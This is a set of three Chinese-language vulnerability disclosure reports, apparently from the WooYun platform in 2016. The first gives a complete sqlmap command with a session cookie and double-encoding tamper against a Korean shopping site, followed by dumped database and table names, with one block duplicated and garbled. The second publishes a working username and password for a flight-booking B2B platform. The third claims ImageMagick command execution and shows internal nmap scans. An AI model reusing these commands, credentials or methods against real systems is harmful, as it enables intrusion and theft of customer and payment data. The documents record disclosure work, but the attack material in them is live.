漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：下午提交但是一直没出数据，对流量分析后发现原流量双编码，tamper之后出了数据，韩国人的数据库名不熟悉，没有具体探测数据详细说明：python sqlmap.py -u "http://**.**.**.**/product/Api.do?_method=getNewOption&callback=jQuery111106387168327488439_1462148731058&PRD_NO=4020676593&OPT_TP=01&OPT_NM1=%25EC%2584%25A0%25ED%2583%259D1&_=1462148731059" --user-agent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.94 Safari/537.36" --cookie "wingState=visible; ipzone=HK; city=Central District; CURRENCY=cny; lang=zh_CN; tiemzone=9; _gat=1; IPCODE=003; interparkstamp_global=1308199864190577841264109964981971; LANGUAGE=zh-cn; igfsTodayViewPrdNo=4020676593; igfsTodayViewImg=/goods_image/6/5/9/3/4020676593i.jpg; igfsTodayViewAge=0; JSESSIONID=lQ5uADDlvsvop1Ps44WS73oeA64Aa2wJzaVuUkIhdyMWIr33QJf7GbO15oUWqUfW; _ga=GA1.2.449814888.1462148585" --time-sec=3 --tamper chardoubleencode.py漏洞证明：[21:48:42] [DEBUG] performed 0 queries in 0.02 secondsavailable databases [9]:[*] ADM[*] APEX_030200[*] CBT[*] CTXSYS[*] EXFSYS[*] MDSYS[*] SYS[*] SYSTEM[*] XDB[21:48:42] [INFO] fetching tables for databases: 'ADM, APEX_030200, CBT, CTXSYS, EXFSYS, MDSYS, SYS, SYSTEM, XDB'[21:48:42] [DEBUG] performed 0 queries in 0.12 secondsDatabase: EXFSYS[1 table]+--------------------------------+| RLM$PARSEDCOND |+--------------------------------+Database: XDB[2 tables]+--------------------------------+| XDB$IMPORT_TT_INFO || XDB$XIDX_IMP_T |+--------------------------------+Database: APEX_030200[3 tables]+--------------------------------+| WWV_FLOW_DUAL100 || WWV_FLOW_LOV_TEMP || WWV_FLOW_TEMP_TABLE |+--------------------------------+Database: SYSTEM[4 tables]+--------------------------------+| HELP || OL$ || OL$HINTS || OL$NODES |+--------------------------------+Database: SYS[26 tables]+--------------------------------+| DUAL || AUDIT_ACTIONS || DATA_PUMP_XPL_TABLE$ || HS$_PARALLEL_METADATA || HS_BULKLOAD_VIEW_OBJ || HS_PARTITION_COL_NAME || HS_PARTITION_COL_TYPE || IMPDP_STATS || KU$NOEXP_TAB || KU$XKTFBUE || KU$_DATAPUMP_MASTER_10_1 || KU$_DATAPUMP_MASTER_11_1 || KU$_DATAPUMP_MASTER_11_1_0_7 || KU$_DATAPUMP_MASTER_11_2 || KU$_LIST_FILTER_TEMP || KU$_LIST_FILTER_TEMP_2 || ODCI_PMO_ROWIDS$ || ODCI_SECOBJ$ || ODCI_WARNINGS$ || PLAN_TABLE$ || PSTUBTBL || STMT_AUDIT_OPTION_MAP || SYSTEM_PRIVILEGE_MAP || TABLE_PRIVILEGE_MAP || WRI$_ADV_ASA_RECO_DATA || WRR$_REPLAY_CALL_FILTER |+--------------------------------+Database: MDSYS[35 tables]+--------------------------------+| NTV2_XML_DATA || OGIS_GEOMETRY_COLUMNS || OGIS_SPATIAL_REFERENCE_SYSTEMS || SDO_COORD_AXES || SDO_COORD_AXIS_NAMES || SDO_COORD_OPS || SDO_COORD_OP_METHODS || SDO_COORD_OP_PARAMS || SDO_FEATURE_USAGE || SDO_PREFERRED_OPS_SYSTEM || SDO_PREFERRED_OPS_USER || SDO_PRIME_MERIDIANS || SDO_PROJECTIONS_OLD_SNAPSHOT || SDO_ST_TOLERANCE || SDO_TOPO_DATA$ || SDO_TOPO_RELATION_DATA || SDO_TOPO_TRANSACT_DATA || SDO_TXN_IDX_DELETES || SDO_TXN_IDX_EXP_UPD_RGN || SDO_TXN_IDX_INSERTS || SDO_UNITS_OF_MEASURE || SDO_XML_SCHEMAS || SRSNAMESPACE_TABLE |+--------------------------------+Database: CBT[5 tables]+--------------------------------+| PLAN_TABLE || TEMP_CBT || TMP_GLOBAL_LOGIN_CNT_20150226 || TMP_GLOBAL_LOGIN_CNT_20150522 || TRACE |+--------------------------------+Database: ADM[166 tables]+--------------------------------+| BANNER_CONTENT || BANNER_GROUP_MASTER || BANNER_GROUP_MEMBER || BANNER_ITEM || BANNER_ITEM_HTML || BEST_USED_WRITTEN || BEST_USED_WRITTEN_ADMIN || BOARD || BOARD_DTL || B_WORK1 || B_WORK2 || CARD_PAYMENT || CARD_PAYMENT_HIS || CART || CATEGORY_ADDINFO_MGT || CBT_CONTB_PROFIT_CODE || CBT_TRANS_INFO || CLM_REQUEST || CLM_REQUESTDTL || CODE_DETAIL || CODE_MASTER || CONTENT_RECOMMEND || CONTENT_REPORT || COPY_T || COUNTRY_MAP || COUPON || COUPON_CBT_COND || COUPON_CBT_PBLCT || COUPON_EXCEPT_PRD || COUPON_RANDOM || D2D_PRODUCT_PARCEL_TAX || D2D_WEIGHT_SHIPPING_FEE || DELVWH_ORDER || DISPLAY_MENU || ENTR_ANTI_MEMBER || EVENT || EVENT_FREECODE || EXCHANGE_RATE || EX_ORDER_INFO || FAQ || FAQ_DTL || FAVORITE_ENTR || FREECODE_EVENT || FREEDELV_EXCEPTION || IGS_MENU || IGS_MENU_AUTH || IGS_USER || IGS_USER_AUTHORITY || IGS_USER_GROUP || IGS_USER_GROUP_AUTH || ILS_DELVWH_ORDER || ILS_DELVWH_ORDERPRD || ILS_DELV_INVOICE || ILS_ORD_UPDPROC || ILS_RTN_PRD || INICIS_PAY_INFO || INPAK_DLV_INF || INQUIRY || INQUIRY_REPLY || IPP_MALL_INFO || IPP_MALL_TRACE || IPP_VISIT_DDSUM || LANGCODE_TAG || LANGCODE_TAG2VALUE || LANGCODE_VALUE || LOG || LOGIN_SESSION || MAIL_SEND_HISTORY || MD_ORDERDTL_BUYCONFIRM || MEMBER_GLOBAL || MEMBER_GLOBAL_TEMP || MENU || MILEAGE_UNAVAILABLE || ORDERCLM || ORDERCLMDTL || ORDERCLMDTL_DISCOUNT || ORDERCLMDTL_ENTR || ORDERCLMDTL_STATUS_HIS || ORDERCLMDTL_STORE || ORDERCLM_ACCESS_INFO || ORDERCLM_CRTTP_PRCS || ORDERCLM_DELV || ORDERCLM_DELVAMT || ORDERCLM_DELV_COUPON || ORDERCLM_DELV_PLACE || ORDERCLM_DELV_PLACE_BASIC || ORDERCLM_DELV_WEIGHT || ORDERCLM_EOD || ORDERCLM_EXCEPTION || ORDERCLM_MISS_DELV || ORDERCLM_PRODUCT_HIS || ORDERCLM_STATUS_HIS || ORDER_RELEASE_LIMIT || ORDPAYMENT_REFUND || ORDPAYMENT_REFUND_DTL || RESTAPI_MALL_INFO || RESTAPI_PRODUCT_SET || RESTAPI_WHITE_LIST || REVIEW_SCRAP || REV_CARD_PAYMENT_DDSUM || REV_DELVAMT_DDSUM || REV_DIFF_HST || REV_DIFF_RSN || REV_EXT_DDSUM || REV_IPOINT_DDSUM || REV_ORDCLMDTL_ORG_SUM || REV_ORDCLMDTL_SUM || REV_ORDCLM_EXPENSE_SUM || REV_ORDPAYMENT_REFUND_SUM || REV_PAY_LOG || REV_PRCS_HST || REV_SETL_DELVAMT_LOG || REV_SETL_PRD_LOG_CBT || ROULETTE_ACC_HIS || ROULETTE_RANK || ROULETTE_RANK_TP || SERVICE_USED_WRITTEN || SERVICE_USED_WRITTEN_DTL || TEMP_PRODUCT_KTY2 || TENPAY_PAYMENT || TENPAY_PAYMENT_AUTH || TENPAY_PAYMENT_HIS || TMP_CLAIM || TMP_T_IP_CITY || TMP_T_LOCATION || TOAD_PLAN_TABLE || TRULY_COMMENT || TRUNCATE_TAB_LIST || TRY_CBT_TRANS_INFO || TRY_ORD || TRY_ORDDELV_PLACE || TRY_ORDDTL_DISCOUNT || TRY_ORD_DELVAMT || TRY_ORD_DELV_COUPON || TRY_ORD_DTL || TRY_PAYMENT || TTT || T_IP_CITY || T_LOCATION || USED_WRITTEN_ADDINFO || USED_WRITTEN_MEMBER_01 || USED_WRITTEN_PRODUCT_01 || USED_WRITTEN_REPLY || WORK_CALENDAR || ZZIM_CNT || ZZIM_LIST |+--------------------------------+Database: CTXSYS[5 tables]+--------------------------------+| DR$NUMBER_SEQUENCE || DR$OBJECT_ATTRIBUTE || DR$POLICY_TAB || TRY_ORD_DELVAMT || TRY_ORD_DELV_COUPON || TRY_ORD_DTL || TRY_PAYMENT || TTT || T_IP_CITY || T_LOCATION || USED_WRITTEN_ADDINFO || USED_WRITTEN_MEMBER_01 || USED_WRITTEN_PRODUCT_01 || USED_WRITTEN_REPLY || WORK_CALENDAR || ZZIM_CNT || ZZIM_LIST |+--------------------------------+Database: CTXSYS[5 tables]+--------------------------------+| DR$NUMBER_SEQUENCE || DR$OBJECT_ATTRIBUTE || DR$POLICY_TAB || DR$THS || DR$THS_PHRASE |+--------------------------------+修复方案：过滤版权声明：转载请注明来源 hear7v@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：11确认时间：2016-05-06 17:38厂商回复：CNVD确认并复现所述情况，已经转由CNCERT向KRCERT组织通报，由其后续协调网站管理单位处置。最新状态：暂无

漏洞详情披露状态： 2016-04-26： 细节已通知厂商并且等待厂商处理中2016-04-28： 厂商已经确认，细节仅向厂商公开2016-05-08： 细节向核心白帽子及相关领域专家公开2016-05-18： 细节向普通白帽子公开2016-05-28： 细节向实习白帽子公开2016-06-12： 细节向公众公开简要描述：Trafree国际机票B2B分销平台弱口令详细说明：Trafree国际机票B2B分销平台弱口令http://**.**.**.** 账号：alvinte 密码:123!!漏洞证明： 每天上万订单，包括携程，同城，淘宝订单修复方案：修改弱口令版权声明：转载请注明来源 都好得很@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：7确认时间：2016-04-28 17:32厂商回复：CNVD未直接复现所述情况，暂未建立与网站管理单位的直接处置渠道，待认领。最新状态：暂无

漏洞详情披露状态： 2016-05-05： 细节已通知厂商并且等待厂商处理中2016-05-06： 厂商已经确认，细节仅向厂商公开2016-05-16： 细节向核心白帽子及相关领域专家公开2016-05-26： 细节向普通白帽子公开2016-06-05： 细节向实习白帽子公开2016-06-20： 细节向公众公开简要描述：你懂的详细说明：imagemagick命令执行头像和相册 漏洞证明： Nmap finished: 255 IP addresses (116 hosts up) scanned in 16.709 secondsNmap finished: 255 IP addresses (122 hosts up) scanned in 17.396 seconds还有好多其他内网网段修复方案：不深入了版权声明：转载请注明来源 管管侠@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：10确认时间：2016-05-06 12:00厂商回复：已经查阅，尽快修复最新状态：2016-05-06：谢谢管管侠